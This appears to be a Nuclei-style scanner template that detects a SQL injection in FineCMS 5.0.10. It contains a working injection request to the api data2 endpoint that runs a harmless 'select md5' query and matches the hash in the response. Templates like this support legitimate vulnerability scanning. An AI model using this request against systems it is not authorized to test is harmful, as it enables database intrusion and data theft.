25 lines
548 B
YAML
25 lines
548 B
YAML
id: finecms-sqli
|
|
|
|
info:
|
|
name: FineCMS 5.0.10 - SQL Injection
|
|
author: ritikchaddha
|
|
severity: high
|
|
description: |
|
|
SQL Injection exists in FineCMS 5.0.10.
|
|
reference:
|
|
- https://blog.csdn.net/dfdhxb995397/article/details/101385340
|
|
tags: finecms,sqli
|
|
|
|
variables:
|
|
num: "999999999"
|
|
|
|
requests:
|
|
- method: GET
|
|
path:
|
|
- '{{BaseURL}}/index.php?c=api&m=data2&auth=582f27d140497a9d8f048ca085b111df¶m=action=sql%20sql=%27select%20md5({{num}})%27'
|
|
|
|
matchers:
|
|
- type: word
|
|
words:
|
|
- '{{md5({{num}})}}'
|